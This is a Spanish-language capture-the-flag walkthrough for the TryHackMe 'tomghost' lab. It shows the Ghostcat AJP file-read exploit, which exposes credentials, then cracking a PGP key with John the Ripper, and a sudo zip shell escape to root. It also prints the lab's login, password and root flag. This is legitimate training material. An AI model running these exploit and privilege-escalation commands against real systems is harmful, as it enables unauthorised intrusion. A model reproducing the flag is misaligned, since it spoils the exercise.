tomghost (ajp13)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)Exploit:
searchsploit ajpgit clone https://github.com/00theway/Ghostcat-CNVD-2020-10487
cd GhostcatEjecutaste el exploit ajpShooter.py:
python3 ajpShooter.py http://10.10.84.159:8080 8009 /WEB-INF/web.xml readskyfuck:8730281lkjlkjdqlksalksUna vez tenemos user
Para ESCALAR PRIVILEGIOS tenemos que descargar los archivos que tiene la maquina victima y poder leerlos en vuestra maquina:
skyfuck@ubuntu:~$ ls
credential.pgp tryhackme.asc┌──(docker㉿docker)-[~/Tryhackme/Ghostcat-CNVD-2020-10487]
└─$ scp skyfuck@10.10.202.58:/home/skyfuck/tryhackme.asc .
skyfuck@10.10.202.58's password:
tryhackme.asc 100% 5144 13.6KB/s 00:00
┌──(docker㉿docker)-[~/Tryhackme/Ghostcat-CNVD-2020-10487]
└─$ ls
README.md ajp-execute.png ajp-read.png ajp-save.png ajpShooter.py tryhackme.ascUsaremos JohnTheRipper para descifrar este archivo de clave. Pero primero, necesitamos generar el hash de este archivo de clave, que luego descifraremos mediante fuerza bruta.
Lo pasamos a hash
──(docker㉿docker)-[~/Tryhackme/Ghostcat-CNVD-2020-10487]
└─$ gpg2john tryhackme.asc > hashDespues utilizamos jhon
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashEscalada de privilegios
Enumeraste permisos de sudo para
merlin:sudo -lResultado:
javascriptCopiar códigoUser merlin may run the following commands on ubuntu: (root : root) NOPASSWD: /usr/bin/zip
Comando:
merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User merlin may run the following commands on ubuntu:
(root : root) NOPASSWD: /usr/bin/zip
merlin@ubuntu:~$ touch haha.txt
merlin@ubuntu:~$ sudo zip root.zip haha.txt -T --unzip-command="sh -c /bin/bash"
adding: haha.txt (stored 0%)
root@ubuntu:~# ls
haha.txt user.txt ziaQD7oI
root@ubuntu:~# cd /root
root@ubuntu:/root# ls
root.txt ufw
root@ubuntu:/root# cat root.txt
THM{Z1P_1S_FAKE}
root@ubuntu:/root# Last updated